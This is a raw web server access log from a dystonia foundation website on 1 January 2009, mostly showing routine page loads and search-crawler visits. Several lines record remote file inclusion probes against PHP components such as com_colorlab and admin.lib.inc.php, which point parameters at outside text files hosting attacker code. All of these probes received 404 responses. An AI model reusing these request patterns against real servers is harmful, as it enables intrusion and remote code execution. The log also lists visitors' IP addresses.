124.29.206.50 - - [01/Jan/2009:00:44:55 -0600] "GET //filebin/images/nav/off/news_and_resources.gif HTTP/1.1" 200 626 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:55 -0600] "GET //filebin/images/nav/off/media.gif HTTP/1.1" 200 477 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:55 -0600] "GET /filebin/images/go_btn.gif HTTP/1.1" 200 268 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:55 -0600] "GET //filebin/images/nav/off/treatments.gif HTTP/1.1" 200 472 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:56 -0600] "GET /filebin/mightymenu/script/page_cookies.php?page_id=54 HTTP/1.1" 200 763 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:56 -0600] "GET //filebin/images/nav/off/calendar_of_events.gif HTTP/1.1" 200 647 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:56 -0600] "GET /filebin/images/search_corner.gif HTTP/1.1" 200 131 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:56 -0600] "GET /filebin/images/arrow.gif HTTP/1.1" 200 48 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:57 -0600] "GET /filebin/images/section_arrow.gif HTTP/1.1" 200 316 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:57 -0600] "GET /filebin/images/email_btn.gif HTTP/1.1" 200 56 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:57 -0600] "GET /filebin/images/print_btn.gif HTTP/1.1" 200 62 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:57 -0600] "GET /filebin/js/replace_text.js HTTP/1.1" 200 188 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.29.206.50 - - [01/Jan/2009:00:44:58 -0600] "GET /filebin/flash/meta_normal.swf HTTP/1.1" 200 9682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.25.139 - - [01/Jan/2009:00:45:02 -0600] "GET /filebin/pdf/Braindonorbrochure_06-07-07.pdf HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.139 - - [01/Jan/2009:00:45:03 -0600] "GET /filebin/pdf/surgweb.pdf HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
76.29.105.106 - - [01/Jan/2009:00:45:24 -0600] "GET /favicon.ico HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MSN 9.0;MSN 9.1;MSN 9.6; MSNbMSNI; MSNmen-us; MSNcIA)"
81.52.143.15 - - [01/Jan/2009:00:45:42 -0600] "GET / HTTP/1.1" 200 4566 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
124.29.206.50 - - [01/Jan/2009:00:46:48 -0600] "GET //filebin/images/nav/on/media_ro.gif HTTP/1.1" 200 477 "http://www.dystonia-foundation.org/pages/more_info/54.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.131.106.1 - - [01/Jan/2009:00:47:14 -0600] "GET /pages/dystonia_advocacy_coalition/300.php HTTP/1.0" 200 15559 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
75.101.240.68 - - [01/Jan/2009:00:48:02 -0600] "GET /pages/dmrfc_partnering_with_cihr_to_fund_research/400.php HTTP/1.1" 200 15622 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)"
62.94.24.125 - - [01/Jan/2009:00:48:20 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://67921.webhosting25.1blu.de/familiederkampftrinker/id.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.803"
72.30.65.51 - - [01/Jan/2009:00:49:11 -0600] "GET /pages/articles_from_the_dystonia_dialogue/221.php?id=1 HTTP/1.0" 200 23675 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.131.106.1 - - [01/Jan/2009:00:49:43 -0600] "GET /pages/stretching_and_strengthening/118.php HTTP/1.0" 200 21530 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
72.30.65.51 - - [01/Jan/2009:00:50:43 -0600] "GET /pages/tips_for_maintaining_emotional_health/332.php HTTP/1.0" 200 22312 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.136 - - [01/Jan/2009:00:51:38 -0600] "GET /pages/practice_relaxation/242.php HTTP/1.1" 200 5159 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.65.51 - - [01/Jan/2009:00:55:01 -0600] "GET /pages/sarah_s_blog/437.php HTTP/1.0" 200 24416 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.65.51 - - [01/Jan/2009:00:55:33 -0600] "GET /pages/volunteers_needed_for_cervical_dystonia_research_study/403.php HTTP/1.0" 200 16042 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.173.161.208 - - [01/Jan/2009:00:56:00 -0600] "GET /errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
62.173.161.208 - - [01/Jan/2009:00:56:00 -0600] "GET /~dystonia/logs/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
66.249.71.136 - - [01/Jan/2009:00:56:11 -0600] "GET /pages/finding_a_mental_health_professional/100.php HTTP/1.1" 200 5981 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.37.123 - - [01/Jan/2009:00:58:58 -0600] "GET /pages/articles/226.php?id=69 HTTP/1.0" 200 14000 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.173.161.208 - - [01/Jan/2009:00:59:40 -0600] "GET /%257Edystonia/logs/dystonia-foundation.org-error_log//include/admin.lib.inc.php?site_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 376 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.173.161.208 - - [01/Jan/2009:00:59:41 -0600] "GET /%257Edystonia/logs//include/admin.lib.inc.php?site_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
130.14.16.128 - - [01/Jan/2009:01:00:27 -0600] "GET /robots.txt HTTP/1.1" 404 309 "-" "mozilla (nlmoccssearchadmin@mail.nlm.nih.gov)"
130.14.16.128 - - [01/Jan/2009:01:00:29 -0600] "GET /pages/find_a_support_group/233.php HTTP/1.1" 200 5073 "-" "mozilla (nlmoccssearchadmin@mail.nlm.nih.gov)"
130.14.16.128 - - [01/Jan/2009:01:00:41 -0600] "GET /pages/find_a_healthcare_professional/158.php HTTP/1.1" 200 5986 "-" "mozilla (nlmoccssearchadmin@mail.nlm.nih.gov)"
130.14.16.128 - - [01/Jan/2009:01:00:44 -0600] "GET / HTTP/1.1" 200 4566 "-" "mozilla (nlmoccssearchadmin@mail.nlm.nih.gov)"
65.55.230.193 - - [01/Jan/2009:01:01:30 -0600] "GET /filebin/images/NewContent/?S=D HTTP/1.1" 200 1628 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
62.94.24.125 - - [01/Jan/2009:01:02:12 -0600] "GET /~dystonia/logs/dystonia-foundation.org-error_log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://67921.webhosting25.1blu.de/familiederkampftrinker/id.txt? HTTP/1.1" 404 387 "-" "libwww-perl/5.803"
62.94.24.125 - - [01/Jan/2009:01:02:12 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://67921.webhosting25.1blu.de/familiederkampftrinker/id.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.803"
62.94.24.125 - - [01/Jan/2009:01:02:13 -0600] "GET /~dystonia/logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://67921.webhosting25.1blu.de/familiederkampftrinker/id.txt? HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
88.131.106.1 - - [01/Jan/2009:01:03:36 -0600] "GET /pages/reimbursement/130.php HTTP/1.0" 200 23442 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
64.182.124.212 - - [01/Jan/2009:01:04:01 -0600] "GET /pages/x_linked_dystonia_parkinsonism/94.php HTTP/1.1" 200 26012 "http://myhealthcare.com" "Mozilla/4.0"
71.122.32.48 - - [01/Jan/2009:01:04:56 -0600] "GET / HTTP/1.1" 200 4566 "http://www.google.com/search?hl=en&q=dystonia&aq=0s&oq=systonia" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:56 -0600] "GET /filebin/js/swfobject.js HTTP/1.1" 200 5955 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:56 -0600] "GET /filebin/js/js_rollover.js HTTP/1.1" 200 778 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:56 -0600] "GET /filebin/images/dystonia.gif HTTP/1.1" 200 3663 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:56 -0600] "GET /filebin/images/canada_leaf.gif HTTP/1.1" 200 200 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:56 -0600] "GET /filebin/css/default.css HTTP/1.1" 200 1695 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/dystonia_defined.gif HTTP/1.1" 200 568 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/cure_dystonia_initiative.gif HTTP/1.1" 200 731 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/media.gif HTTP/1.1" 200 477 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/treatments.gif HTTP/1.1" 200 472 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/calendar_of_events.gif HTTP/1.1" 200 647 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/about_the_foundation.gif HTTP/1.1" 200 684 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/living_with_dystonia.gif HTTP/1.1" 200 400 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/order_brochures.gif HTTP/1.1" 200 848 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/donate.gif HTTP/1.1" 200 383 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/advocacy.gif HTTP/1.1" 200 445 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/research.gif HTTP/1.1" 200 421 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/how_you_can_help.gif HTTP/1.1" 200 565 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/contact_us.gif HTTP/1.1" 200 470 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET //filebin/images/nav/off/news_and_resources.gif HTTP/1.1" 200 626 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET /filebin/images/go_btn.gif HTTP/1.1" 200 268 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:57 -0600] "GET /filebin/images/search_corner.gif HTTP/1.1" 200 131 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:58 -0600] "GET /filebin/images/nav/on/igive125x75.gif HTTP/1.1" 200 2153 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:59 -0600] "GET /filebin/images/nav/on/title_smaller.gif HTTP/1.1" 200 2628 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:04:59 -0600] "GET /filebin/images/arrow.gif HTTP/1.1" 200 48 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:05:00 -0600] "GET /filebin/flash/home.swf HTTP/1.1" 200 241625 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:06:23 -0600] "GET //filebin/images/nav/on/how_you_can_help.gif HTTP/1.1" 200 565 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:06:23 -0600] "GET //filebin/images/nav/on/research.gif HTTP/1.1" 200 421 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:06:23 -0600] "GET //filebin/images/nav/on/living_with_dystonia.gif HTTP/1.1" 200 400 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:06:23 -0600] "GET //filebin/images/nav/on/order_brochures.gif HTTP/1.1" 200 848 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:06:23 -0600] "GET //filebin/images/nav/on/calendar_of_events.gif HTTP/1.1" 200 647 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:06:32 -0600] "GET //filebin/images/nav/on/how_you_can_help.gif HTTP/1.1" 200 565 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
72.30.65.51 - - [01/Jan/2009:01:06:32 -0600] "GET /pages/articles/226.php?id=140 HTTP/1.0" 200 13986 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
71.122.32.48 - - [01/Jan/2009:01:07:07 -0600] "GET //filebin/images/nav/on/news_and_resources.gif HTTP/1.1" 200 626 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:07:08 -0600] "GET //filebin/images/nav/on/advocacy.gif HTTP/1.1" 200 445 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:07:11 -0600] "GET //filebin/images/nav/on/contact_us.gif HTTP/1.1" 200 470 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:07:11 -0600] "GET //filebin/images/nav/on/donate.gif HTTP/1.1" 200 383 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:07:11 -0600] "GET //filebin/images/nav/on/about_the_foundation.gif HTTP/1.1" 200 684 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:07:11 -0600] "GET //filebin/images/nav/on/media_ro.gif HTTP/1.1" 200 477 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
71.122.32.48 - - [01/Jan/2009:01:07:13 -0600] "GET //filebin/images/nav/on/about_the_foundation.gif HTTP/1.1" 200 684 "http://www.dystonia-foundation.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461)"
66.249.71.135 - - [01/Jan/2009:01:08:13 -0600] "GET /filebin/mightymenu/script/page_cookies.php?page_id=97 HTTP/1.1" 200 302 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.230.193 - - [01/Jan/2009:01:10:03 -0600] "GET /filebin/images/NewContent/?D=D HTTP/1.1" 200 1634 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
193.47.80.42 - - [01/Jan/2009:01:10:50 -0600] "GET /robots.txt HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.42 - - [01/Jan/2009:01:10:52 -0600] "GET / HTTP/1.1" 200 4566 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
98.20.192.245 - - [01/Jan/2009:01:10:54 -0600] "GET / HTTP/1.1" 200 4566 "http://www.google.com/search?hl=en&q=dystonia&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:10:57 -0600] "GET //filebin/images/favicon.ico HTTP/1.1" 200 824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:10:57 -0600] "GET /filebin/js/swfobject.js HTTP/1.1" 200 5955 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:00 -0600] "GET /filebin/js/js_rollover.js HTTP/1.1" 200 778 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:02 -0600] "GET /filebin/images/dystonia.gif HTTP/1.1" 200 3663 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:02 -0600] "GET /filebin/images/canada_leaf.gif HTTP/1.1" 200 200 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:02 -0600] "GET /filebin/css/default.css HTTP/1.1" 200 1695 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:04 -0600] "GET //filebin/images/nav/off/treatments.gif HTTP/1.1" 200 472 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:04 -0600] "GET //filebin/images/nav/off/calendar_of_events.gif HTTP/1.1" 200 647 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:04 -0600] "GET //filebin/images/nav/off/about_the_foundation.gif HTTP/1.1" 200 684 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:04 -0600] "GET //filebin/images/nav/off/cure_dystonia_initiative.gif HTTP/1.1" 200 731 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:04 -0600] "GET //filebin/images/nav/off/dystonia_defined.gif HTTP/1.1" 200 568 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:04 -0600] "GET //filebin/images/nav/off/media.gif HTTP/1.1" 200 477 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:05 -0600] "GET //filebin/images/nav/off/living_with_dystonia.gif HTTP/1.1" 200 400 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:05 -0600] "GET //filebin/images/nav/off/order_brochures.gif HTTP/1.1" 200 848 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:05 -0600] "GET //filebin/images/nav/off/donate.gif HTTP/1.1" 200 383 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:05 -0600] "GET //filebin/images/nav/off/research.gif HTTP/1.1" 200 421 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:05 -0600] "GET //filebin/images/nav/off/advocacy.gif HTTP/1.1" 200 445 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:07 -0600] "GET //filebin/images/nav/off/contact_us.gif HTTP/1.1" 200 470 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:07 -0600] "GET /filebin/flash/home.swf HTTP/1.1" 200 32768 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:07 -0600] "GET //filebin/images/nav/off/how_you_can_help.gif HTTP/1.1" 200 565 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:07 -0600] "GET //filebin/images/nav/off/news_and_resources.gif HTTP/1.1" 200 626 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:07 -0600] "GET /filebin/images/go_btn.gif HTTP/1.1" 200 268 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:07 -0600] "GET /filebin/images/search_corner.gif HTTP/1.1" 200 131 "http://www.dystonia-foundation.org/filebin/css/default.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:08 -0600] "GET /filebin/images/arrow.gif HTTP/1.1" 200 48 "http://www.dystonia-foundation.org/filebin/css/default.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:09 -0600] "GET /filebin/images/nav/on/igive125x75.gif HTTP/1.1" 200 2153 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:11:09 -0600] "GET /filebin/images/nav/on/title_smaller.gif HTTP/1.1" 200 2628 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
65.55.25.139 - - [01/Jan/2009:01:11:11 -0600] "GET /filebin/pdf/Ver%202%20DBS.pdf HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
